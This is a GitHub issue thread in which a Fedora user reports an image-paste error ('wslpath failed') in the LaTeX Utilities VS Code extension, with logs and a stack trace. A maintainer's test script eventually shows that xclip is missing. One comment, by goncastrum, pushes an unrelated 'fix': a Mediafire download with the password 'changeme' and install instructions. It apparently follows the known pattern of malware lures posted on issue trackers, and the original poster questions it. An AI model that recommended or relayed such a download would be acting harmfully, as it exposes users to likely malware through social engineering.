### ISSUE TITLE
Pasting Images Error - Linux

### ISSUE THREAD

**Issue by martinprad0** [tecosaur/LaTeX-Utilities#403]
#### Disable all the other extensions except for LaTeX Workshop and LaTeX Utilities, and check that you still see this issue.

You still see this issue?:  Yes

### Describe the bug
When I try to paste an image using **LaTeX Utilities: Paste formatted content** I get the following the dialog to paste the image:

![image](https://github.com/user-attachments/assets/075259bd-0079-45c5-83a4-9bb36ffd3543)

However, I get the following message after pressing Enter:

```Error occured while trying to paste image. Name: Error, Message: wslpath failed with code 1 and signal null ```

The image doesn't save on the disk and the latex document stays the same

### To Reproduce

Steps to reproduce the behaviour:

1. Press Ctr+Shift+P (Or just Ctrl+Shift+V)
2. Run **LaTeX Utilities: Paste formatted content**
3. Get Error

### Expected behaviour

The image should be saved on the disk and the macro for including that image should be triggered.

### Logs

<details>
<summary>LaTeX Workshop Output</summary>

```

```

</details>

<details>
<summary>LaTeX Utilities Output</summary>

```
[17:43:15] withTelemetry: formattedPaste
[17:43:15] Performing formatted paste
[17:43:15] Pasting: Image. imgFile: undefined
[17:43:16] Image path: /home/martin/Documents/VSCode/Latex/time-series-homework/HW1/exercises/image1.png
[17:43:16] save and paste. imagePath: /home/martin/Documents/VSCode/Latex/time-series-homework/HW1/exercises/image1.png
[17:43:16] paste image success. returning
[17:43:19] withTelemetry: onDidChangeActiveTextEditor_tex_wordcounter
```

</details>

<details>
<summary>Developer Tools Console</summary>

![image](https://github.com/user-attachments/assets/2481d423-d0e4-43f2-a2e3-e778e6cd5428)

```
[Extension Host] Error: wslpath failed with code 1 and signal null
	at ChildProcess.<anonymous> (/home/martin/.vscode/extensions/tecosaur.latex-utilities-0.4.14/out/main.js:56:2257)
	at ChildProcess.emit (node:events:519:28)
	at ChildProcess._handle.onexit (node:internal/child_process:294:12)

v Error occured while trying to paste image. Name: Error, Message: wslpath failed with code 1 and signal null
c @ notificationsAlerts.ts:42
```

</details>

### Desktop

-   OS: Fedora Linux 39
-   VS Code version: 1.92.2-1723661076.el8
-   Extension version: v0.4.14

### Additional context

When trying to paste tables, the dialog for saving image1.png appears too. The tables paste after pressing escape without any issue.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by martinprad0** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

Could you elaborate more about how that could help in my exact situation? Where did you find that?

**Comment by leoleoasd** [comment]
Hi, can you try copy an image and manually run this file:
https://github.com/tecosaur/LaTeX-Utilities/blob/master/scripts/saveclipimg-linux.sh
```
./saveclipimg-linux.sh file_name.jpg
```

**Comment by martinprad0** [comment]
It seems that I didn't have the xclip package installed on my machine. Thank you so much.
